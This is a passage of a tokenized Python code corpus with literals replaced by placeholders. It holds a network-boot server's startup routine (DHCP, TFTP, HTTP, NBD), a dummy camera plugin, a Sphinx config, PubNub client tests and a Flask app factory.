add_argument ( '<STR_LIT>' , action = '<STR_LIT>' , dest = '<STR_LIT>' , help = '<STR_LIT>' , default = not SETTINGS [ '<STR_LIT>' ] ) <EOL> exclusive . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store_true>' , dest = '<STR_LIT>' , help = '<STR_LIT>' , default = SETTINGS [ '<STR_LIT>' ] ) <EOL> exclusive . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store_true>' , dest = '<STR_LIT>' , help = '<STR_LIT>' , default = SETTINGS [ '<STR_LIT>' ] ) <EOL> dhcp_group . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store>' , dest = '<STR_LIT>' , help = '<STR_LIT>' , default = SETTINGS [ '<STR_LIT>' ] ) <EOL> dhcp_group . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store>' , dest = '<STR_LIT>' , help = '<STR_LIT>' , default = SETTINGS [ '<STR_LIT>' ] ) <EOL> dhcp_group . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store>' , dest = '<STR_LIT>' , help = '<STR_LIT>' , default = SETTINGS [ '<STR_LIT>' ] ) <EOL> dhcp_group . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store>' , dest = '<STR_LIT>' , help = '<STR_LIT>' , default = SETTINGS [ '<STR_LIT>' ] ) <EOL> dhcp_group . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store>' , dest = '<STR_LIT>' , help = '<STR_LIT>' , default = SETTINGS [ '<STR_LIT>' ] ) <EOL> dhcp_group . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store>' , dest = '<STR_LIT>' , help = '<STR_LIT>' , default = SETTINGS [ '<STR_LIT>' ] ) <EOL> dhcp_group . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store>' , dest = '<STR_LIT>' , help = '<STR_LIT>' , default = SETTINGS [ '<STR_LIT>' ] ) <EOL> dhcp_group . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store>' , dest = '<STR_LIT>' , help = '<STR_LIT>' , default = SETTINGS [ '<STR_LIT>' ] ) <EOL> dhcp_group . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store>' , dest = '<STR_LIT>' , help = '<STR_LIT>' , default = SETTINGS [ '<STR_LIT>' ] ) <EOL> dhcp_group . 
add_argument ( '<STR_LIT>' , action = '<STR_LIT:store_true>' , dest = '<STR_LIT>' , help = '<STR_LIT>' , default = False ) <EOL> parser . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store>' , dest = '<STR_LIT>' , help = '<STR_LIT>' , default = SETTINGS [ '<STR_LIT>' ] ) <EOL> parser . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store>' , dest = '<STR_LIT>' , help = '<STR_LIT>' , default = SETTINGS [ '<STR_LIT>' ] ) <EOL> nbd_group = parser . add_argument_group ( title = '<STR_LIT>' , description = '<STR_LIT>' ) <EOL> nbd_group . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store>' , dest = '<STR_LIT>' , help = '<STR_LIT>' , default = SETTINGS [ '<STR_LIT>' ] ) <EOL> nbd_group . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store_true>' , dest = '<STR_LIT>' , help = '<STR_LIT>' , default = SETTINGS [ '<STR_LIT>' ] ) <EOL> nbd_group . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store_true>' , dest = '<STR_LIT>' , help = '<STR_LIT>' , default = SETTINGS [ '<STR_LIT>' ] ) <EOL> nbd_group . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store_true>' , dest = '<STR_LIT>' , help = '<STR_LIT>' , default = SETTINGS [ '<STR_LIT>' ] ) <EOL> nbd_group . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store_true>' , dest = '<STR_LIT>' , help = '<STR_LIT>' , default = SETTINGS [ '<STR_LIT>' ] ) <EOL> nbd_group . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store>' , dest = '<STR_LIT>' , help = '<STR_LIT>' , default = SETTINGS [ '<STR_LIT>' ] ) <EOL> nbd_group . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store>' , dest = '<STR_LIT>' , help = '<STR_LIT>' , default = SETTINGS [ '<STR_LIT>' ] ) <EOL> return parser . parse_args ( ) <EOL> def do_debug ( service ) : <EOL> return ( ( service in args . MODE_DEBUG . lower ( ) <EOL> or '<STR_LIT:all>' in args . MODE_DEBUG . lower ( ) ) <EOL> and '<STR_LIT>' . format ( service ) not in args . MODE_DEBUG . lower ( ) ) <EOL> def do_verbose ( service ) : <EOL> return ( ( service in args . MODE_VERBOSE . 
lower ( ) <EOL> or '<STR_LIT:all>' in args . MODE_VERBOSE . lower ( ) ) <EOL> and '<STR_LIT>' . format ( service ) not in args . MODE_VERBOSE . lower ( ) ) <EOL> def main ( ) : <EOL> global SETTINGS , args <EOL> try : <EOL> if os . getuid ( ) != <NUM_LIT:0> : <EOL> print '<STR_LIT>' <EOL> args = parse_cli_arguments ( ) <EOL> if args . JSON_CONFIG : <EOL> try : <EOL> config_file = open ( args . JSON_CONFIG , '<STR_LIT:rb>' ) <EOL> except IOError : <EOL> sys . exit ( '<STR_LIT>' . format ( args . JSON_CONFIG ) ) <EOL> try : <EOL> loaded_config = json . load ( config_file ) <EOL> config_file . close ( ) <EOL> except ValueError : <EOL> sys . exit ( '<STR_LIT>' . format ( args . JSON_CONFIG ) ) <EOL> for setting in loaded_config : <EOL> if type ( loaded_config [ setting ] ) is unicode : <EOL> loaded_config [ setting ] = loaded_config [ setting ] . encode ( '<STR_LIT:ascii>' ) <EOL> SETTINGS . update ( loaded_config ) <EOL> args = parse_cli_arguments ( ) <EOL> if args . STATIC_CONFIG : <EOL> try : <EOL> static_config = open ( args . STATIC_CONFIG , '<STR_LIT:rb>' ) <EOL> except IOError : <EOL> sys . exit ( "<STR_LIT>" . format ( args . STATIC_CONFIG ) ) <EOL> try : <EOL> loaded_statics = json . load ( static_config ) <EOL> static_config . close ( ) <EOL> except ValueError : <EOL> sys . exit ( "<STR_LIT>" . format ( args . STATIC_CONFIG ) ) <EOL> else : <EOL> loaded_statics = dict ( ) <EOL> sys_logger = logging . getLogger ( '<STR_LIT>' ) <EOL> if args . SYSLOG_SERVER : <EOL> handler = logging . handlers . SysLogHandler ( address = ( args . SYSLOG_SERVER , int ( args . SYSLOG_PORT ) ) ) <EOL> else : <EOL> handler = logging . StreamHandler ( ) <EOL> formatter = logging . Formatter ( '<STR_LIT>' ) <EOL> handler . setFormatter ( formatter ) <EOL> sys_logger . addHandler ( handler ) <EOL> sys_logger . setLevel ( logging . INFO ) <EOL> if args . USE_HTTP and not args . USE_IPXE and not args . USE_DHCP : <EOL> sys_logger . warning ( '<STR_LIT>' ) <EOL> if args . 
DHCP_MODE_PROXY : <EOL> args . USE_DHCP = True <EOL> if args . NETBOOT_FILE == '<STR_LIT>' : <EOL> if not args . USE_IPXE : <EOL> args . NETBOOT_FILE = '<STR_LIT>' <EOL> elif not args . USE_HTTP : <EOL> args . NETBOOT_FILE = '<STR_LIT>' <EOL> else : <EOL> args . NETBOOT_FILE = '<STR_LIT>' <EOL> if args . NBD_WRITE and not args . NBD_COW : <EOL> sys_logger . warning ( '<STR_LIT>' ) <EOL> if args . NBD_COW_IN_MEM or args . NBD_COPY_TO_RAM : <EOL> sys_logger . warning ( '<STR_LIT>' ) <EOL> if args . NBD_COW and not args . NBD_WRITE : <EOL> args . NBD_WRITE = True <EOL> running_services = [ ] <EOL> if args . USE_TFTP : <EOL> tftp_logger = sys_logger . getChild ( '<STR_LIT>' ) <EOL> sys_logger . info ( '<STR_LIT>' ) <EOL> tftp_server = tftp . TFTPD ( mode_debug = do_debug ( '<STR_LIT>' ) , mode_verbose = do_verbose ( '<STR_LIT>' ) , logger = tftp_logger , netboot_directory = args . NETBOOT_DIR ) <EOL> tftpd = threading . Thread ( target = tftp_server . listen ) <EOL> tftpd . daemon = True <EOL> tftpd . start ( ) <EOL> running_services . append ( tftpd ) <EOL> if args . USE_DHCP : <EOL> dhcp_logger = sys_logger . getChild ( '<STR_LIT>' ) <EOL> if args . DHCP_MODE_PROXY : <EOL> sys_logger . info ( '<STR_LIT>' ) <EOL> else : <EOL> sys_logger . info ( '<STR_LIT>' ) <EOL> dhcp_server = dhcp . DHCPD ( <EOL> ip = args . DHCP_SERVER_IP , <EOL> port = args . DHCP_SERVER_PORT , <EOL> offer_from = args . DHCP_OFFER_BEGIN , <EOL> offer_to = args . DHCP_OFFER_END , <EOL> subnet_mask = args . DHCP_SUBNET , <EOL> router = args . DHCP_ROUTER , <EOL> dns_server = args . DHCP_DNS , <EOL> broadcast = args . DHCP_BROADCAST , <EOL> file_server = args . DHCP_FILESERVER , <EOL> file_name = args . NETBOOT_FILE , <EOL> use_ipxe = args . USE_IPXE , <EOL> use_http = args . USE_HTTP , <EOL> mode_proxy = args . DHCP_MODE_PROXY , <EOL> mode_debug = do_debug ( '<STR_LIT>' ) , <EOL> mode_verbose = do_verbose ( '<STR_LIT>' ) , <EOL> whitelist = args . 
DHCP_WHITELIST , <EOL> static_config = loaded_statics , <EOL> logger = dhcp_logger , <EOL> saveleases = args . LEASES_FILE ) <EOL> dhcpd = threading . Thread ( target = dhcp_server . listen ) <EOL> dhcpd . daemon = True <EOL> dhcpd . start ( ) <EOL> running_services . append ( dhcpd ) <EOL> if args . USE_HTTP : <EOL> http_logger = sys_logger . getChild ( '<STR_LIT>' ) <EOL> sys_logger . info ( '<STR_LIT>' ) <EOL> http_server = http . HTTPD ( mode_debug = do_debug ( '<STR_LIT:http>' ) , mode_verbose = do_debug ( '<STR_LIT:http>' ) , logger = http_logger , netboot_directory = args . NETBOOT_DIR ) <EOL> httpd = threading . Thread ( target = http_server . listen ) <EOL> httpd . daemon = True <EOL> httpd . start ( ) <EOL> running_services . append ( httpd ) <EOL> if args . NBD_BLOCK_DEVICE : <EOL> nbd_logger = sys_logger . getChild ( '<STR_LIT>' ) <EOL> sys_logger . info ( '<STR_LIT>' ) <EOL> nbd_server = nbd . NBD ( <EOL> block_device = args . NBD_BLOCK_DEVICE , <EOL> write = args . NBD_WRITE , <EOL> cow = args . NBD_COW , <EOL> in_mem = args . NBD_COW_IN_MEM , <EOL> copy_to_ram = args . NBD_COPY_TO_RAM , <EOL> ip = args . NBD_SERVER_IP , <EOL> port = args . NBD_PORT , <EOL> mode_debug = do_debug ( '<STR_LIT>' ) , <EOL> mode_verbose = do_verbose ( '<STR_LIT>' ) , <EOL> logger = nbd_logger , <EOL> netboot_directory = args . NETBOOT_DIR ) <EOL> nbdd = threading . Thread ( target = nbd_server . listen ) <EOL> nbdd . daemon = True <EOL> nbdd . start ( ) <EOL> running_services . append ( nbdd ) <EOL> sys_logger . info ( '<STR_LIT>' ) <EOL> while map ( lambda x : x . isAlive ( ) , running_services ) : <EOL> sleep ( <NUM_LIT:1> ) <EOL> except KeyboardInterrupt : <EOL> sys . exit ( '<STR_LIT>' ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
<s> import time <EOL> import numpy as N <EOL> import numpy . random <EOL> from traits . api import Int , Constant , Range , Property , cached_property <EOL> from traitsui . api import View , Item , HGroup , VGroup , Label <EOL> from Camera import Camera <EOL> class DummyGaussian ( Camera ) : <EOL> plugin_info = { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT:description>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> _zero = Constant ( <NUM_LIT:0.0> ) <EOL> _x_resolution = Property ( fget = lambda self : self . resolution [ <NUM_LIT:0> ] , <EOL> depends_on = '<STR_LIT>' ) <EOL> _y_resolution = Property ( fget = lambda self : self . resolution [ <NUM_LIT:1> ] , <EOL> depends_on = '<STR_LIT>' ) <EOL> _half_x_resolution = Property ( depends_on = '<STR_LIT>' ) <EOL> _half_y_resolution = Property ( depends_on = '<STR_LIT>' ) <EOL> _half_minimum_resolution = Property ( depends_on = '<STR_LIT>' ) <EOL> centroid_x = Range ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> centroid_y = Range ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> centroid = Property ( depends_on = '<STR_LIT>' ) <EOL> radius = Range ( '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) <EOL> amplitude = Int ( <NUM_LIT> ) <EOL> noise_amplitude = Int ( <NUM_LIT> ) <EOL> view = View ( <EOL> HGroup ( <EOL> Item ( '<STR_LIT>' , style = '<STR_LIT>' ) , <EOL> Label ( '<STR_LIT>' ) ) , <EOL> VGroup ( <EOL> Item ( '<STR_LIT>' ) , <EOL> Item ( '<STR_LIT>' ) ) , <EOL> Item ( '<STR_LIT>' ) , <EOL> Item ( '<STR_LIT>' ) , <EOL> Item ( '<STR_LIT>' ) , <EOL> title = '<STR_LIT>' ) <EOL> def __init__ ( self , ** traits ) : <EOL> super ( DummyGaussian , self ) . __init__ ( resolution = ( <NUM_LIT> , <NUM_LIT> ) , <EOL> id_string = '<STR_LIT>' , <EOL> ** traits ) <EOL> self . _supported_resolutions = [ ( <NUM_LIT> , <NUM_LIT> ) , ( <NUM_LIT> , <NUM_LIT> ) ] <EOL> @ cached_property <EOL> def _get__half_x_resolution ( self ) : <EOL> return self . 
resolution [ <NUM_LIT:0> ] / <NUM_LIT> <EOL> @ cached_property <EOL> def _get__half_y_resolution ( self ) : <EOL> return self . resolution [ <NUM_LIT:1> ] / <NUM_LIT> <EOL> @ cached_property <EOL> def _get__half_minimum_resolution ( self ) : <EOL> return min ( self . _half_x_resolution , self . _half_y_resolution ) <EOL> @ cached_property <EOL> def _get_centroid ( self ) : <EOL> return ( self . centroid_x , self . centroid_y ) <EOL> def _set_centroid ( self , value ) : <EOL> self . centroid_x , self . centroid_y = value <EOL> def open ( self ) : <EOL> pass <EOL> def close ( self ) : <EOL> pass <EOL> def query_frame ( self ) : <EOL> """<STR_LIT>""" <EOL> width , height = self . resolution <EOL> x , y = N . ogrid [ <NUM_LIT:0> : height , <NUM_LIT:0> : width ] <EOL> y0 , x0 = self . centroid <EOL> r = N . hypot ( x - x0 , y - y0 ) <EOL> self . frame = N . array ( N . exp ( - r ** <NUM_LIT:2> / self . radius ** <NUM_LIT:2> ) * self . amplitude , <EOL> dtype = N . uint16 ) <EOL> self . frame += N . random . uniform ( low = <NUM_LIT:0> , high = self . noise_amplitude , <EOL> size = ( height , width ) ) <EOL> time . sleep ( <NUM_LIT:1.0> / self . frame_rate ) <EOL> def find_resolutions ( self ) : <EOL> return self . _supported_resolutions </s>
<s> import sys <EOL> import os <EOL> sys . path . insert ( <NUM_LIT:0> , os . path . abspath ( '<STR_LIT>' ) ) <EOL> extensions = [ <EOL> '<STR_LIT>' , <EOL> ] <EOL> templates_path = [ '<STR_LIT>' ] <EOL> source_suffix = '<STR_LIT>' <EOL> master_doc = '<STR_LIT:index>' <EOL> project = u'<STR_LIT>' <EOL> copyright = u'<STR_LIT>' <EOL> version = '<STR_LIT>' <EOL> release = '<STR_LIT>' <EOL> exclude_patterns = [ ] <EOL> pygments_style = '<STR_LIT>' <EOL> html_theme = '<STR_LIT:default>' <EOL> html_static_path = [ '<STR_LIT>' ] <EOL> htmlhelp_basename = '<STR_LIT>' <EOL> latex_elements = { <EOL> } <EOL> latex_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> u'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> man_pages = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> [ u'<STR_LIT>' ] , <NUM_LIT:1> ) <EOL> ] <EOL> texinfo_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> u'<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> ] </s>
<s> import time <EOL> from pubnub import PubnubTwisted as Pubnub <EOL> pubkey = "<STR_LIT>" <EOL> subkey = "<STR_LIT>" <EOL> pubnub = Pubnub ( pubkey , subkey ) <EOL> pubnub_enc = Pubnub ( pubkey , subkey , cipher_key = "<STR_LIT>" ) <EOL> def test_1 ( ) : <EOL> channel = "<STR_LIT>" + str ( time . time ( ) ) <EOL> message = "<STR_LIT>" <EOL> def _cb ( resp , ch = None ) : <EOL> assert resp == message <EOL> pubnub . unsubscribe ( channel ) <EOL> def _connect ( resp ) : <EOL> def _cb1 ( resp , ch = None ) : <EOL> assert resp [ <NUM_LIT:0> ] == <NUM_LIT:1> <EOL> def _err1 ( resp ) : <EOL> assert False <EOL> pubnub . publish ( channel , message , callback = _cb1 , error = _err1 ) <EOL> def _error ( resp ) : <EOL> assert False <EOL> pubnub . subscribe ( channel , callback = _cb , connect = _connect , error = _error ) <EOL> def test_2 ( ) : <EOL> channel = "<STR_LIT>" + str ( time . time ( ) ) <EOL> message = [ <NUM_LIT:1> , <NUM_LIT:2> ] <EOL> def _cb ( resp , ch = None ) : <EOL> assert resp == message <EOL> pubnub . unsubscribe ( channel ) <EOL> def _connect ( resp ) : <EOL> def _cb1 ( resp , ch = None ) : <EOL> assert resp [ <NUM_LIT:0> ] == <NUM_LIT:1> <EOL> def _err1 ( resp ) : <EOL> print ( resp ) <EOL> assert False <EOL> pubnub . publish ( channel , message , callback = _cb1 , error = _err1 ) <EOL> def _error ( resp ) : <EOL> assert False <EOL> pubnub . subscribe ( channel , callback = _cb , connect = _connect , error = _error ) <EOL> def test_3 ( ) : <EOL> channel = "<STR_LIT>" + str ( time . time ( ) ) <EOL> message = { "<STR_LIT:a>" : "<STR_LIT:b>" } <EOL> def _cb ( resp , ch = None ) : <EOL> assert resp == message <EOL> pubnub . unsubscribe ( channel ) <EOL> def _connect ( resp ) : <EOL> def _cb1 ( resp , ch = None ) : <EOL> assert resp [ <NUM_LIT:0> ] == <NUM_LIT:1> <EOL> def _err1 ( resp ) : <EOL> assert False <EOL> pubnub . publish ( channel , message , callback = _cb1 , error = _err1 ) <EOL> def _error ( resp ) : <EOL> assert False <EOL> pubnub . 
subscribe ( channel , callback = _cb , connect = _connect , error = _error ) <EOL> def test_4 ( ) : <EOL> channel = "<STR_LIT>" + str ( time . time ( ) ) <EOL> message = <NUM_LIT:100> <EOL> def _cb ( resp , ch = None ) : <EOL> assert resp == message <EOL> pubnub . unsubscribe ( channel ) <EOL> def _connect ( resp ) : <EOL> def _cb1 ( resp , ch = None ) : <EOL> assert resp [ <NUM_LIT:0> ] == <NUM_LIT:1> <EOL> def _err1 ( resp ) : <EOL> assert False <EOL> pubnub . publish ( channel , message , callback = _cb1 , error = _err1 ) <EOL> def _error ( resp ) : <EOL> assert False <EOL> pubnub . subscribe ( channel , callback = _cb , connect = _connect , error = _error ) <EOL> def test_5 ( ) : <EOL> channel = "<STR_LIT>" + str ( time . time ( ) ) <EOL> message = "<STR_LIT:100>" <EOL> def _cb ( resp , ch = None ) : <EOL> assert resp == message <EOL> pubnub . unsubscribe ( channel ) <EOL> def _connect ( resp ) : <EOL> def _cb1 ( resp , ch = None ) : <EOL> assert resp [ <NUM_LIT:0> ] == <NUM_LIT:1> <EOL> def _err1 ( resp ) : <EOL> assert False <EOL> pubnub . publish ( channel , message , callback = _cb1 , error = _err1 ) <EOL> def _error ( resp ) : <EOL> assert False <EOL> pubnub . subscribe ( channel , callback = _cb , connect = _connect , error = _error ) <EOL> def test_6 ( ) : <EOL> channel = "<STR_LIT>" + str ( time . time ( ) ) <EOL> message = "<STR_LIT>" <EOL> def _cb ( resp , ch = None ) : <EOL> assert resp == message <EOL> pubnub_enc . unsubscribe ( channel ) <EOL> def _connect ( resp ) : <EOL> def _cb1 ( resp , ch = None ) : <EOL> assert resp [ <NUM_LIT:0> ] == <NUM_LIT:1> <EOL> def _err1 ( resp ) : <EOL> assert False <EOL> pubnub_enc . publish ( channel , message , callback = _cb1 , error = _err1 ) <EOL> def _error ( resp ) : <EOL> assert False <EOL> pubnub_enc . subscribe ( channel , callback = _cb , connect = _connect , error = _error ) <EOL> def test_7 ( ) : <EOL> channel = "<STR_LIT>" + str ( time . 
time ( ) ) <EOL> message = [ <NUM_LIT:1> , <NUM_LIT:2> ] <EOL> def _cb ( resp , ch = None ) : <EOL> assert resp == message <EOL> pubnub_enc . unsubscribe ( channel ) <EOL> def _connect ( resp ) : <EOL> def _cb1 ( resp , ch = None ) : <EOL> assert resp [ <NUM_LIT:0> ] == <NUM_LIT:1> <EOL> def _err1 ( resp ) : <EOL> assert False <EOL> pubnub_enc . publish ( channel , message , callback = _cb1 , error = _err1 ) <EOL> def _error ( resp ) : <EOL> assert False <EOL> pubnub_enc . subscribe ( channel , callback = _cb , connect = _connect , error = _error ) <EOL> def test_8 ( ) : <EOL> channel = "<STR_LIT>" + str ( time . time ( ) ) <EOL> message = { "<STR_LIT:a>" : "<STR_LIT:b>" } <EOL> def _cb ( resp , ch = None ) : <EOL> assert resp == message <EOL> pubnub_enc . unsubscribe ( channel ) <EOL> def _connect ( resp ) : <EOL> def _cb1 ( resp , ch = None ) : <EOL> assert resp [ <NUM_LIT:0> ] == <NUM_LIT:1> <EOL> def _err1 ( resp ) : <EOL> assert False <EOL> pubnub_enc . publish ( channel , message , callback = _cb1 , error = _err1 ) <EOL> def _error ( resp ) : <EOL> assert False <EOL> pubnub_enc . subscribe ( channel , callback = _cb , connect = _connect , error = _error ) <EOL> def test_9 ( ) : <EOL> channel = "<STR_LIT>" + str ( time . time ( ) ) <EOL> message = <NUM_LIT:100> <EOL> def _cb ( resp , ch = None ) : <EOL> assert resp == message <EOL> pubnub_enc . unsubscribe ( channel ) <EOL> def _connect ( resp ) : <EOL> def _cb1 ( resp , ch = None ) : <EOL> assert resp [ <NUM_LIT:0> ] == <NUM_LIT:1> <EOL> def _err1 ( resp ) : <EOL> assert False <EOL> pubnub_enc . publish ( channel , message , callback = _cb1 , error = _err1 ) <EOL> def _error ( resp ) : <EOL> assert False <EOL> pubnub_enc . subscribe ( channel , callback = _cb , connect = _connect , error = _error ) <EOL> def test_10 ( ) : <EOL> channel = "<STR_LIT>" + str ( time . time ( ) ) <EOL> message = "<STR_LIT:100>" <EOL> def _cb ( resp , ch = None ) : <EOL> assert resp == message <EOL> pubnub_enc . 
unsubscribe ( channel ) <EOL> def _connect ( resp ) : <EOL> def _cb1 ( resp , ch = None ) : <EOL> assert resp [ <NUM_LIT:0> ] == <NUM_LIT:1> <EOL> def _err1 ( resp ) : <EOL> assert False <EOL> pubnub_enc . publish ( channel , message , callback = _cb1 , error = _err1 ) <EOL> def _error ( resp ) : <EOL> assert False <EOL> pubnub_enc . subscribe ( channel , callback = _cb , connect = _connect , error = _error ) <EOL> def test_11 ( ) : <EOL> channel = "<STR_LIT>" + str ( time . time ( ) ) <EOL> message = '<STR_LIT>' <EOL> def _cb ( resp , ch = None ) : <EOL> assert resp == message <EOL> pubnub_enc . unsubscribe ( channel ) <EOL> def _connect ( resp ) : <EOL> def _cb1 ( resp , ch = None ) : <EOL> assert resp [ <NUM_LIT:0> ] == <NUM_LIT:1> <EOL> def _err1 ( resp ) : <EOL> assert False <EOL> pubnub_enc . publish ( channel , message , callback = _cb1 , error = _err1 ) <EOL> def _error ( resp ) : <EOL> assert False <EOL> pubnub_enc . subscribe ( channel , callback = _cb , connect = _connect , error = _error ) <EOL> def test_12 ( ) : <EOL> channel = "<STR_LIT>" + str ( time . time ( ) ) <EOL> message = '<STR_LIT>' <EOL> def _cb ( resp , ch = None ) : <EOL> assert resp == message <EOL> pubnub_enc . unsubscribe ( channel ) <EOL> def _connect ( resp ) : <EOL> def _cb1 ( resp , ch = None ) : <EOL> assert resp [ <NUM_LIT:0> ] == <NUM_LIT:1> <EOL> def _err1 ( resp ) : <EOL> assert False <EOL> pubnub_enc . publish ( channel , message , callback = _cb1 , error = _err1 ) <EOL> def _error ( resp ) : <EOL> assert False <EOL> pubnub_enc . subscribe ( channel , callback = _cb , connect = _connect , error = _error ) <EOL> x = <NUM_LIT:5> <EOL> def run_test ( t ) : <EOL> global x <EOL> x += <NUM_LIT:5> <EOL> i = ( x / <NUM_LIT:5> ) - <NUM_LIT:1> <EOL> def _print ( ) : <EOL> print ( '<STR_LIT>' + str ( i ) ) <EOL> pubnub . timeout ( x , _print ) <EOL> pubnub . timeout ( x + <NUM_LIT:1> , t ) <EOL> def stop ( ) : <EOL> pubnub . 
stop ( ) <EOL> run_test ( test_1 ) <EOL> run_test ( test_2 ) <EOL> run_test ( test_3 ) <EOL> run_test ( test_4 ) <EOL> run_test ( test_5 ) <EOL> run_test ( test_6 ) <EOL> run_test ( test_7 ) <EOL> run_test ( test_8 ) <EOL> run_test ( test_9 ) <EOL> run_test ( test_10 ) <EOL> run_test ( test_11 ) <EOL> run_test ( stop ) <EOL> pubnub_enc . start ( ) </s>
<s> import sys <EOL> from pubnub import Pubnub <EOL> pubnub = Pubnub ( publish_key = '<STR_LIT>' , subscribe_key = '<STR_LIT>' ) <EOL> channel = '<STR_LIT>' <EOL> username = '<STR_LIT>' <EOL> message = '<STR_LIT>' <EOL> data = { <EOL> '<STR_LIT:username>' : username , <EOL> '<STR_LIT:message>' : message <EOL> } <EOL> def callback ( m ) : <EOL> print ( m ) <EOL> pubnub . publish ( channel , data , callback = callback , error = callback ) </s>
<s> import logging <EOL> from logging . handlers import SMTPHandler <EOL> from flask import Flask , current_app <EOL> from flask import url_for as flask_url_for <EOL> from flask_admin import Admin <EOL> from flask . ext . sqlalchemy import SQLAlchemy <EOL> from flask . ext . assets import Environment <EOL> from flask . ext . migrate import Migrate <EOL> from flask_oauthlib . client import OAuth <EOL> from flask_mail import Mail <EOL> from kombu import Exchange , Queue <EOL> from celery import Celery <EOL> from elasticsearch import Elasticsearch <EOL> from aleph import default_settings , archive <EOL> db = SQLAlchemy ( ) <EOL> migrate = Migrate ( ) <EOL> mail = Mail ( ) <EOL> celery = Celery ( '<STR_LIT>' ) <EOL> assets = Environment ( ) <EOL> oauth = OAuth ( ) <EOL> oauth_provider = oauth . remote_app ( '<STR_LIT>' , app_key = '<STR_LIT>' ) <EOL> admin = Admin ( template_mode = '<STR_LIT>' ) <EOL> def create_app ( config = { } ) : <EOL> app = Flask ( '<STR_LIT>' ) <EOL> app . config . from_object ( default_settings ) <EOL> if config . get ( '<STR_LIT>' ) : <EOL> app . config . from_envvar ( '<STR_LIT>' , silent = True ) <EOL> else : <EOL> app . config . from_envvar ( '<STR_LIT>' , silent = True ) <EOL> app . config . update ( config ) <EOL> app_name = app . config . get ( '<STR_LIT>' ) <EOL> if not app . debug and app . config . get ( '<STR_LIT>' ) : <EOL> credentials = ( app . config . get ( '<STR_LIT>' ) , <EOL> app . config . get ( '<STR_LIT>' ) ) <EOL> mail_handler = SMTPHandler ( app . config . get ( '<STR_LIT>' ) , <EOL> app . config . get ( '<STR_LIT>' ) , <EOL> app . config . get ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' % app_name , <EOL> credentials = credentials , <EOL> secure = ( ) ) <EOL> mail_handler . setLevel ( logging . ERROR ) <EOL> app . logger . addHandler ( mail_handler ) <EOL> if '<STR_LIT>' not in app . config . get ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> raise RuntimeError ( "<STR_LIT>" ) <EOL> queue_name = app_name + '<STR_LIT>' <EOL> app . 
config [ '<STR_LIT>' ] = queue_name <EOL> app . config [ '<STR_LIT>' ] = ( <EOL> Queue ( queue_name , Exchange ( queue_name ) , routing_key = queue_name ) , <EOL> ) <EOL> celery . conf . update ( app . config ) <EOL> celery . conf . update ( { <EOL> '<STR_LIT>' : app . config [ '<STR_LIT>' ] <EOL> } ) <EOL> migrate . init_app ( app , db , directory = app . config . get ( '<STR_LIT>' ) ) <EOL> oauth . init_app ( app ) <EOL> mail . init_app ( app ) <EOL> db . init_app ( app ) <EOL> assets . init_app ( app ) <EOL> admin . init_app ( app ) <EOL> return app <EOL> @ migrate . configure <EOL> def configure_alembic ( config ) : <EOL> app = current_app . _get_current_object ( ) <EOL> config . set_main_option ( '<STR_LIT>' , <EOL> app . config [ '<STR_LIT>' ] ) <EOL> return config <EOL> def get_config ( name , default = None ) : <EOL> return current_app . config . get ( name , default ) <EOL> def get_es ( ) : <EOL> app = current_app . _get_current_object ( ) <EOL> if not hasattr ( app , '<STR_LIT>' ) : <EOL> app . _es_instance = Elasticsearch ( app . config . get ( '<STR_LIT>' ) , <EOL> timeout = <NUM_LIT> ) <EOL> return app . _es_instance <EOL> def get_es_index ( ) : <EOL> app = current_app . _get_current_object ( ) <EOL> return app . config . get ( '<STR_LIT>' , app . config . get ( '<STR_LIT>' ) ) <EOL> def get_archive ( ) : <EOL> app = current_app . _get_current_object ( ) <EOL> if not hasattr ( app , '<STR_LIT>' ) : <EOL> app . _aleph_archive = archive . from_config ( app . config ) <EOL> return app . _aleph_archive <EOL> def url_for ( * a , ** kw ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> kw [ '<STR_LIT>' ] = True <EOL> if get_config ( '<STR_LIT>' ) : <EOL> kw [ '<STR_LIT>' ] = get_config ( '<STR_LIT>' ) <EOL> return flask_url_for ( * a , ** kw ) <EOL> except RuntimeError : <EOL> return None </s>
